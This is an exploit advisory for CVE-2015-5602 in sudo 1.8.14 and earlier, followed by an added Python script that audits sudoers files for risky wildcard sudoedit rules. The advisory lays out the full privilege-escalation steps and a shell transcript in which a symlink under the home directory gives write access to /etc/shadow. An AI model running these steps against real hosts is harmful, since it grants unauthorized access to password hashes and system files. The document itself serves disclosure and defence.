exploit - Sudo <=1.8.14 - Unauthorized Privilege
2015-08-06 16:15
# Exploit Title: sudo -e - a.k.a. sudoedit - unauthorized privilege escalation
# Date: 07-23-2015
# Exploit Author: Daniel Svartman
# Version: Sudo <=1.8.14
# Tested on: RHEL 5/6/7 and Ubuntu (all versions)
# CVE: CVE-2015-5602.

Hello,

I found a security bug in sudo (checked in the latest versions of sudo running on RHEL and Ubuntu) when a user is granted root access to modify a particular file that could be located in a subset of directories.

It seems that sudoedit does not check the full path if a wildcard is used twice (e.g. /home/*/*/file.txt), allowing a malicious user to replace the real file.txt with a symbolic link to a different location (e.g. /etc/shadow).

I was able to perform such a redirect and retrieve the data from the /etc/shadow file.

In order for you to replicate this, you should configure the following line in your /etc/sudoers file:

    <user_to_grant_priv> ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt

Then, logged in as that user, create a subdirectory within its home folder (e.g. /home/<user_to_grant_priv>/newdir) and later create a symbolic link inside the new folder named test.txt pointing to /etc/shadow.

When you run sudoedit /home/<user_to_grant_priv>/newdir/test.txt you will be allowed to access /etc/shadow even if you have not been granted such access in the sudoers file.

I checked this against fixed directories and files (not using a wildcard) and it does work with symbolic links created under the /home folder.
CREATE A NORMAL USER
-bash-3.2# useradd -b /home/ -c "normal user" -u 1000 -m -s /bin/bash -p password centos
-bash-3.2# ls -l /home/
total 8
drwx------ 4 centos centos 4096 Aug 6 04:00 centos
MODIFY SUDOERS CONFIGURATION
centos ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt
PWN
-bash-3.2# su centos
[centos@lab centos]$ pwd
/home/centos
[centos@lab centos]$ mkdir pwn
[centos@lab centos]$ cd pwn/
[centos@lab pwn]$ ln -s /etc/shadow /home/centos/pwn/test.txt
[centos@lab pwn]$ ls -l /home/centos/pwn/
total 4
lrwxrwxrwx 1 centos centos 11 Aug 6 04:04 test.txt -> /etc/shadow
[centos@lab pwn]$ sudoedit /home/centos/pwn/test.txt
BINGO! We can modify /etc/shadow now.
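
A defensive check for the configuration described above, as an added example that is not part of the original advisory or of sudo: it scans sudoers text for sudoedit rules whose path contains a wildcard, and lists existing files matching such a rule that are symbolic links. The function names, the HIGH/MEDIUM labels and the sample rules other than the advisory's own are assumptions of this example.

```python
import glob
import os
import re

WILDCARD = re.compile(r"(?<!\\)[*?\[]")  # unescaped sudoers glob characters

# Constructed sample sudoers content; the first rule is the one from the advisory.
SAMPLE = """\
centos ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt
alice  ALL=(root) sudoedit /etc/motd, \\
                  sudoedit /var/www/conf.d/*.conf
bob    ALL=(root) /usr/bin/systemctl restart nginx
"""

def logical_lines(text):
    """Join backslash-continued lines; drop blank lines and '#' lines.
    Simplification: #include / #includedir files are not followed."""
    joined = re.sub(r"\\\n", "", text)
    return [ln.strip() for ln in joined.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]

def audit_sudoers(text):
    """Return one finding per sudoedit path that contains a wildcard."""
    findings = []
    for rule in logical_lines(text):
        for cmd in re.split(r"(?<!\\),", rule):  # commands are comma separated
            m = re.search(r"(?:^|[\s:=])sudoedit\s+(\S.*)$", cmd.strip())
            if not m:
                continue
            for path in m.group(1).split():
                if not WILDCARD.search(path):
                    continue
                directory = path.rpartition("/")[0]
                # Severity is this example's own heuristic: a wildcard in a
                # directory component can match a directory the user creates.
                level = "HIGH" if WILDCARD.search(directory) else "MEDIUM"
                findings.append({"level": level, "path": path, "rule": rule})
    return findings

def planted_symlinks(pattern):
    """Existing paths matching a flagged pattern that are symbolic links.
    Approximation: uses Python glob rules, not sudo's own matcher."""
    return sorted(p for p in glob.glob(pattern) if os.path.islink(p))

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE):
        links = planted_symlinks(f["path"])
        print(f["level"], f["path"], "symlinks:", links or "none")
```

To audit a real host, pass the contents of /etc/sudoers and each file under /etc/sudoers.d to audit_sudoers and review every HIGH finding by hand.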